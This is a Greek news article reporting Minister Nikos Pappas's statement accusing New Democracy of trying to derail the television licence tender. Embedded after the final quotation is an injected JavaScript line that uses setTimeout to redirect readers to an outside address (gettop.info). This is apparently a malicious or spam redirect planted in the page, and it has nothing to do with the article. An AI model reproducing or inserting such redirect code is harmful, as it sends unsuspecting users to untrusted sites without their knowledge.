Παππάς: Η ΝΔ έχει εξαντληθεί στην προσπάθεια να ματαιώσει τον διαγωνισμό για τις άδειες

0
15

 

Σε δήλωσή του ο υπουργός Επικρατείας Νίκος Παππάς ανέφερε πως «η Νέα Δημοκρατία έχει εξαντληθεί στην προσπάθεια να ματαιώσει τον διαγωνισμό για τις τηλεοπτικές άδειες» και την καλεί να απαντήσει «έστω και τώρα» γιατί δεν έκανε διαγωνισμό τόσα χρόνια, και να δεσμευτεί πως αναγνωρίζει το αποτέλεσμα του διαγωνισμού.

Στη δήλωση του ο κ. Παππάς αναφέρει πως «τελικά το άνθος της ντροπής δεν ανθίζει ούτε στο Μοσχάτο όπως δεν άνθιζε στη Συγγρού». «Ο διαγωνισμός ολοκληρώθηκε και η ΝΔ καλά θα κάνει να το συνειδητοποιήσει», τονίζει και προσθέτει πως «όλοι οι υποψήφιοι έχουν ασκήσει έως εξαντλήσει κάθε νόμιμο δικαίωμα στη μέχρι τώρα διαδικασία».

«Η ΝΔ», σημειώνει, «έχει εξαντληθεί στην προσπάθεια να ματαιώσει το διαγωνισμό που φέρνει 246 εκατ. ευρώ στο δημόσιο ταμείο. Δεσμεύεται μάλιστα πως θα επιστρέψει τα χρήματα».

«Ας απαντήσει λοιπόν έστω και τώρα. Γιατί δεν έκανε διαγωνισμό τόσα χρόνια; Ας δεσμευτεί έστω και τώρα πως αναγνωρίζει το αποτέλεσμα του διαγωνισμού» σημειώνει ο κ. Παππάς. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here